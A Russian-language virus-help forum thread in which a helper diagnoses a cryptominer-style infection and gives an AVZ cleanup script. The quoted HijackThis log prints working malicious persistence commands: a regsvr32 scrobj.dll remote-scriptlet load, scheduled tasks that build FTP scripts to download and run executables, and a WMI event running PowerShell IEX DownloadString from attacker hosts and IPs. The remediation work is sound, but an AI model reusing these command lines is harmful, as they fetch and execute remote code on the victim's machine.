Перейти к содержанию

Тормозит ноутбук после запуска u.exe (lsma12.exe)


cerealguy3456

Рекомендуемые сообщения

После включения через пару минут запускается командная строка которая включает u.exe. Затем ноутбук зависает, не реагирует и не отключается. По адресу где расположен u.exe C:\Windows\inf\aspnet есть еще lsma12. 
Ноутбук работает только в безопасном режиме. 

Пожалуйста, подскажите как удалить вирус? 

 

 

CollectionLog-2020.02.13-14.24.zip

Изменено пользователем cerealguy3456
Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте!

 

Пролечите систему с помощью KVRT.

По окончании зайдите в папку C:\KVRT_Data\, упакуйте папку Reports в архив и прикрепите к следующему сообщению.

 

Также соберите новый CollectionLog Автологером (пробуйте в нормальном режиме).

Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте! 
Спасибо за ответ! 
К сожалению в нормальном режиме так и не удалось просканировать и сделать лог. Даже проверка KVRT была в нормальном режиме один раз прервана. Файлы u.exe и lsma12.exe после удаления появляются снова.
 

 

Reports.rar

CollectionLog-2020.02.13-20.05.zip

Ссылка на комментарий
Поделиться на другие сайты

"Пофиксите" в HijackThis:

O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/13) - {19f74c35-b7d9-495a-9ab1-d6fd62fa7656} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O22 - Task: oka - C:\Windows\system32\cmd.exe /c start c:\windows\inf\aspnet\lsma12.exe
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX 
Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 ClearQuarantineEx(true);
 QuarantineFile('c:\windows\debug\item.dat', '');
 QuarantineFile('c:\windows\debug\ok.dat', '');
 QuarantineFile('c:\windows\help\lsmosee.exe', '');
 QuarantineFile('c:\windows\inf\aspnet\lsma12.exe', '');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
 DeleteSchedulerTask('oka');
 DeleteSchedulerTask('VKDJ');
 DeleteFile('c:\windows\debug\item.dat', '32');
 DeleteFile('c:\windows\debug\ok.dat', '32');
 DeleteFile('c:\windows\help\lsmosee.exe', '32');
 DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '32');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.

 

Пробуйте дальше работать в нормальном режиме.

 

После перезагрузки выполните такой скрипт:

 

begin
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
end.
Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KL-).

 

 

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. В первом диалоговом окне нажмите ОК, удерживая нажатой клавишу Shift.

Прикрепите к следующему сообщению свежий CollectionLog.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • SLIZEN
      Автор SLIZEN
      такая проблема при запуске любой требовательной игры/ программы например фурмарк ноутбук сначала зависает поле перезагружается( в некоторых случаях синий экран) в просмотре событий пишет ошибка 41 связанная с электропитанием хотя зарядка и батарея работают нормально и это только в прогах связанных с видеокартой при серфе в интернете или работе в ворде все нормально. в последний раз услышал очень тихий писк при запуске фурмарка(но может это просто шиза) ноутбук не перегревался (даже не успевал нагреться сразу перезапуск) все менял дрова винду даже ссд и оперативу мало ли. в общем если поможете буду очень признателен
      кста забыл характеристики ноута добавить acer nitro 5 an 515-45 ryzen 7 5800h rtx 3060mobile 16 gb ddr4 3200mh ssd kingston 512g +ssd kingston 1000gb
    • scaramuccia
      Автор scaramuccia
      Всем привет!
      Касперский обнаружил объект HEUR:Trojan.Win32.Generic в установочном exe-файле. Скорее всего это ложное срабатывание, но все же.
      Он показывает полный путь к объекту: папка, архив, установочный файл и т. д. Как Касперский его так разбирает, если этот файл не распаковывается архиватором, пишет: "Ошибка. Есть данные после конца блока полезных данных"?
      Какие есть способы и ресурсы для этого?
      DIE показывает, что большую часть файла занимает оверлей, который хранит какую-то DLL.

    • Jacket45
      Автор Jacket45
      Проблему заметил вчера, в истории ютуба появились видео, которые я никогда не смотрел с 22 июня. Проверил пк drweb-ом, выявил один троян-удалил, поменял пароли, удалил устройство Android с Бангладеша. На протяжении около недели после запуска браузера он закрывался, сегодня заметил что он после закрытия устанавливал adblock, который я удалял. Проверил компьютер drweb-ом, на этот раз ничего не было выявлено. Не уверен что это будет полезно, но уже около полугода у меня запускалось окно cmd.exe и писало что программа успешно запущена. Антивирусники на постоянке никакие не включены, только скачиваю периодически бесплатный разовый drweb. 
      CollectionLog-2025.07.09-11.57.zip
    • Chugunyi
      Автор Chugunyi
      ошибка 0xc0000017 при попытке запуска regedit gpedit.msc , не могу так же сбросить винду, скорее всего после установки доступа дискорд+ютуб
    • Vestlot
      Автор Vestlot
      Скачал фикс на дискорд, думаю, что там и поймал вирус, помогите пожалуйста!
×
×
  • Создать...